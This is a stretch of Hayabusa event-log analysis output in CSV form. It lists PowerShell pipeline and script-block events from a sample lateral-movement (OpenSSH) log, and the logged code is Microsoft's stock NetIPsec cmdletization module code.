$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.562 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.565 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() 
Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try 
{ if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { 
[object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { 
[object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, 